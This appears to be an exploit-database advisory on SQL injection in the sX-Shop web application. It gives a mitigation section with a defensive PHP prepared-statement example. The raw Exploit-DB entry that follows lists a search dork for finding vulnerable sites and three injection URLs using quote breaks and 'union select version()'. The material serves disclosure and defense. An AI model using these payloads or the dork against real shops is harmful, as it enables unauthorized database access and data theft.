Vendor: sX-Shop
By: CoBRa_21
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: sX-Shop
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

sX-Shop SQL Injection Vulnerabilities

sX-Shop is vulnerable to SQL injection. An attacker can inject SQL via the 'product' parameter of the 'index.php' script and the 'id' parameter of the 'question.php' script. The 'tell_a_friend.php' script is vulnerable in the same way via its 'id' parameter.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries instead of building SQL from request input.
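The mitigation applied to a numeric 'id' parameter, as an added example that is not sX-Shop code or the advisory author's. It assumes PHP 8 with PDO; the `products` table, the function names and the in-memory SQLite database are hypothetical stand-ins for the shop's own schema and database.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the shop database (hypothetical schema, not sX-Shop's).
function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)');
    $pdo->exec("INSERT INTO products (id, name) VALUES (513, 'Sample item')");
    return $pdo;
}

// Strict allow-list: a string of 1-9 ASCII digits, greater than zero.
// Anything else is rejected rather than "cleaned", so arrays, signs,
// quotes and trailing SQL never reach the query layer.
function parse_id(mixed $raw): ?int {
    if (!is_string($raw) || !preg_match('/\A[0-9]{1,9}\z/', $raw)) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// The SQL text is a constant; the id travels separately as a bound integer.
function find_product(PDO $pdo, mixed $rawId): ?array {
    $id = parse_id($rawId);
    if ($id === null) {
        return null; // caller should answer with a 400/404, not a database error
    }
    $stmt = $pdo->prepare('SELECT id, name FROM products WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = demo_db();
// Constructed inputs: one valid id, then the request values shown in the advisory.
$inputs = ['513', "_513'", '-513 union select version()'];
foreach ($inputs as $input) {
    $row = find_product($pdo, $input);
    printf("%-34s => %s\n", var_export($input, true), $row ? $row['name'] : 'rejected');
}
```

Validation and binding are independent layers: the prepared statement alone keeps the input out of the SQL text, and the allow-list lets the script fail early with a client error instead of querying at all.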

Exploit-DB raw data:

########################################################################################

sX-Shop SQL Injection Vulnerabilities

########################################################################################

Author : CoBRa_21
Author Web Page :http://ipbul.org
Dork : "powered by sX-Shop"
Script Page : http://www.source-worx.de/

########################################################################################
 
Sql Injection :

http://localhost/[path]/index.php?product=_513' (Sql)
http://localhost/[path]/question.php?id=-513 union select version()  (Sql)
http://localhost/[path]/tell_a_friend.php?id=-500 union select version()  (Sql)

########################################################################################
Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR
########################################################################################